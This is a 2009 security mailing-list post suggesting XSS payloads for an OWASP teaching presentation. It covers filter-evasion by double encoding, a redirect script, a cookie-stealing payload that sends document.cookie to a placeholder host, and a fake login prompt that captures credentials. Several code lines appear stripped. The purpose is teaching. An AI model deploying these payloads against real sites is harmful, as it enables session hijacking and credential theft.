mailing list archives
Cool things to inject via XSS
From: trklisted at networksamurai.org (mOses)
Date: Fri, 29 May 2009 10:50:53 -0400
On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:
Ok, I've got yet another presentation coming up, this time on the
OWASP Top 10 and Mutillidae. One of the things I'm going to cover is
XSS. The canonical example of course is:
but that is boring, and gives folks the impression that XSS is not
that serious. Better short eample swoul be:
One of the more interesting challenges with web applications is the
fact that the browser supports multi encoding types and double
Here is a SIMPLE double encode of your alert:
Hex encode the < and / tags:
Maybe you can avoid simple filtering of a single encode filtering by
encoding the % in the '%3C':
We can go further and continue to obfuscate things and bypass more and
Redirect traffic to your site:
<script>window.location = "http://www.irongeek.com/"</script>
A little cookie Grabbing:
In addition its also worthwhile to note that you do not even need to
have a real running webserver on this particular http://some-ip/
The important thing to note is what the browser is understanding here.
http://some-ip/catch.php? <- this script doesn't technically need to
cookie='+ <--- this is the part that is telling the browser hey in the
actual URL stream append something beyond the cookie= field.
+encodeURI(document.cookie); <- HEY in the URI field insert your
current cookie from this current site and send it in the raw URL.
If you have a backdoor listening shell then you will get the cookie in
a URI encoded format showing up in your listener as a RAW http request.
Or maybe a password form to make people think they have to login,
but it just grabs the credentials:
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
What are other cool thing to inject, besides maybe BeEF, that shows
of how XSS can be a big deal?
leveraging the browser and sending in a port scan and scanning the
network that she is on.
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
Main Web Site: http://pauldotcom.com
-------------- next part --------------
An HTML attachment was scrubbed...
Cool things to inject via XSS mOses (May 29)
- Cool things to inject via XSS, (continued)